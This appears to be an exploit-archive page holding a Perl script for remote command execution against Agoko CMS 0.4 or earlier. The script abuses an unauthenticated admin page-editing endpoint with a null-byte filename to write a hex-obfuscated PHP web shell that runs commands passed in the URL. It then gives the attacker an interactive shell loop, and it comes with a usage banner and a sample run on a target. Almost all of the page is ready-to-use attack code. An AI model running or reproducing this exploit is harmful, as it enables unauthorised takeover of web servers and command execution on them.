[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Agoko CMS <= 0.4 Remote Command Execution Exploit
# Published : 2009-09-09
# Author : StAkeR
# Previous Title : Joomla Component com_joomloc (id) SQL Injection Vulnerability
# Next Title : Mambo Component com_hestar Remote SQL Injection Vulnerability


#!/usr/bin/perl

print q~
--------------------------------------------------
Agoko CMS <= 0.4 remote commands execution exploit
by staker
mail: staker[at]hotmail[dot]it
--------------------------------------------------

[*] Usage   -> perl [xpl.pl] [host] [path]
[*] Example -> perl agk.pl localhost /Agoko

~;

         
#>-----------<#
#>- Working -<#
#>-----------<#########################################
# staker[death]:~/Desktop$ perl a.pl 127.0.0.1 /agoko #
#                                                     #
# --------------------------------------------------  #
# Agoko CMS <= 0.4 remote commands execution exploit  #
# by staker                                           #
# mail: staker[at]hotmail[dot]it                      #
# --------------------------------------------------  #
#                                                     #
# [*] Usage   -> perl [xpl.pl] [host] [path]          #
# [*] Example -> perl agk.pl localhost /Agoko         #
#                                                     #
# shell already exists.                               #
#                                                     #
# Agoko[shell]:~$ uname -n -r                         #
#                                                     #
# death 2.6.27-7-generic                              #
#######################################################


use IO::Socket;
use LWP::Simple;


my $host = shift;
my $path = shift || exit(0);


check_shell($host,$path);


sub check_shell() {
     my $host = $_[0];
     my $path = $_[1] || die $!;
     
     my $packet = "GET /$path/content/shell_vup.php HTTP/1.1rn".
                  "Host: $hostrn".
                  "Cookie: bany=love_mern".
                  "User-Agent: Lynx (textmode)rn".
                  "Connection: closernrn";
     
     if (give_kt($host,$packet) =~ /bany wtf/i) {
        print "[*] shell already exists.n";
        load_cmd($host,$path);
     }
     else {
        print "[*] exploiting..n";
        inject_shell($host,$path);
     }      
}     
                  

sub inject_shell() {
     my ($host,$path) = @_;  
     
     my $shell = "x3Cx3Fx70x68x70x20x20x20x20x20x20x65x72x72".
                 "x6Fx72x5Fx72x65x70x6Fx72x74x69x6Ex67x28x45".
                 "x5Fx41x4Cx4Cx29x3Bx20x20x20x20x20x20x20x20".
                 "x20x20x20x20x69x66x20x28x69x73x73x65x74x28".
                 "x24x5Fx47x45x54x5Bx27x63x6Dx64x27x5Dx29x29".
                 "x20x20x20x20x20x20x20x20x20x20x70x61x73x73".
                 "x74x68x72x75x28x73x74x72x69x70x73x6Cx61x73".
                 "x68x65x73x28x24x5Fx47x45x54x5Bx27x63x6Dx64".
                 "x27x5Dx29x29x3Bx20x20x20x20x20x20x65x6Cx73".
                 "x65x20x20x20x20x20x20x20x20x20x64x69x65x28".
                 "x22x62x61x6Ex79x20x77x74x66x22x29x3Bx20x20".
                 "x20x20x20x20x3Fx3Ex20";
     
     
     my $data = "filename=shell_vup.phpx00&text=$shell&Submit=Speichern";
     
     my $packet = "POST /$path/admintools/editpage-2.php HTTP/1.1rn".
                  "Host: $hostrn".
                  "User-Agent: Mozilla/4.5 [en] (Win95; U)rn".
                  "Cookie: bany=love_mern".
                  "Content-Type: application/x-www-form-urlencodedrn".
                  "Content-Length: ".length($data)."rn".
                  "Connection: closernrn".
                   $data;      
     
     if (give_kt($host,$packet) =~ /erfolgreich eingetragen/i) 
     {
         load_cmd($host,$path) 
     }
     else 
     {
         die "[*] Exploit failed.n";
     }        
     
}                        
   

sub load_cmd() {
     my $host = $_[0];
     my $path = $_[1];
     
     while (1) 
     {
          print "nAgoko[shell]:~$ ";
          chomp (my $cmd = <STDIN>);
          
          exit(0) if $cmd =~ /^(exit|quit|out)+$/i;
          
          getprint("http://$host/$path/content/shell_vup.php?cmd=$cmd");
     }     
}
          
         
sub give_kt() {
     my $input = $_[0];
     my $heads = $_[1] || die $!;
     
     my $result;
     my $socket = IO::Socket::INET->new(
                                         PeerAddr => $input,
                                         PeerPort => 80,
                                         Proto    => 'tcp'
                                       ) || die $!;
     
     $socket->send($heads);
     
     while (<$socket>) { $result .= $_; }
     
     return $result;
} 

# www.Syue.com [2009-09-09]